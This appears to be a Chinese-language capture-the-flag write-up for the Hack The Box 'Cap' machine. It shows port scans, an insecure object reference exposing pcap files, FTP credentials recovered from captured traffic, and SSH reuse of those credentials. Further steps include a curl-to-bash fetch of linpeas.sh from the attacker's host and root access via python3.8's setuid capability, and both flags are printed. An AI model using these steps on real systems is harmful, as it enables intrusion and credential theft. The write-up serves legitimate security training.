Bootstrap

HTB:Cap[WriteUP]

目录

连接至HTB服务器并启动靶机

1.How many TCP ports are open?

2.After running a "Security Snapshot", the browser is redirected to a path of the format /[something]/[id], where [id] represents the id number of the scan. What is the [something]?

3.Are you able to get to other users' scans?

4.What is the ID of the PCAP file that contains sensative data?

5.Which application layer protocol in the pcap file can the sensetive data be found in?

6.We've managed to collect nathan's FTP password. On what other service does this password work?

7.Submit the flag located in the nathan user's home directory.

USER_FLAG:029a9540b5ee478fe3284a27075330da

8.What is the full path to the binary on this machine has special capabilities that can be abused to obtain root privileges?

9.Submit the flag located in root's home directory.

ROOT_FLAG:fd175cc81223fb5a4e73a6d0b31579eb


连接至HTB服务器并启动靶机

靶机IP:10.10.10.245

分配IP:10.10.16.7


1.How many TCP ports are open?

使用fscan或者nmap对靶机端口进行扫描:

fscan -nopoc -nobr -no -h {TARGET_IP}

nmap -p- -T4 --min-rate=1000 -sS -Pn {TARGET_IP}

由fscan、nmap扫描结果可见,靶机开放端口:21、22、80 共3个端口


2.After running a "Security Snapshot", the browser is redirected to a path of the format /[something]/[id], where [id] represents the id number of the scan. What is the [something]?

使用浏览器访问靶机URL,在左侧可以找到Security Snapshot

点击后被重定向至data路径下:


3.Are you able to get to other users' scans?

点击左侧的网络状态(Network Status)按钮:

往下拉可以看到,除了我们本机IP(10.10.16.7),还存在IP:1.1.1.1扫描:(yes)


4.What is the ID of the PCAP file that contains sensative data?

再次点击左侧的Security Snapshot

将URL中data后面的数字修改成0,在数据类型的右侧可见出现了数值:


5.Which application layer protocol in the pcap file can the sensetive data be found in?

拉至页面底部,找到左下角的Download点击下载流量文件:

使用Wireshark打开该pcap文件,可以在ftp协议找到使用用户凭证登录ftp的流量:

账户:nathan

密码:Buck3tH4TF0RM3!


6.We've managed to collect nathan's FTP password. On what other service does this password work?

因为靶机已开启22端口SSH服务,所以我们尝试FTP凭证对SSH服务进行登录:

ssh nathan@{TARGET_IP}


7.Submit the flag located in the nathan user's home directory.

使用上文拿到的FTP凭证,连接至靶机ftp服务器:

ftp {TARGET_IP}

列出该用户下的ftp文件列表:

dir

下载user.txt文件到本地:

get user.txt

查看user.txt文件内容:

cat user.txt

USER_FLAG:029a9540b5ee478fe3284a27075330da


8.What is the full path to the binary on this machine has special capabilities that can be abused to obtain root privileges?

连接上靶机SSH服务器:

ssh nathan@{TARGET_IP}

在本地linpeas.sh文件同目录下使用python开启http.server服务:

靶机直接使用curl访问该文件并启用bash读取返回本地信息:

curl http://{NATIVE_IP}:6666/linpeas.sh | bash

可见/usr/bin/python3.8具有设置文件SUID的权限


9.Submit the flag located in root's home directory.

运行该python文件:

/usr/bin/python3.8

导入系统模块:

import os

将当前进程的用户设置为root用户

os.setuid(0)

启动bash,提权成功:

os.system("/bin/bash")

查找root.txt文件路径:

find / -name 'root.txt' 2>/dev/null

查看root.txt文件内容:

cat /root/root.txt

ROOT_FLAG:fd175cc81223fb5a4e73a6d0b31579eb

;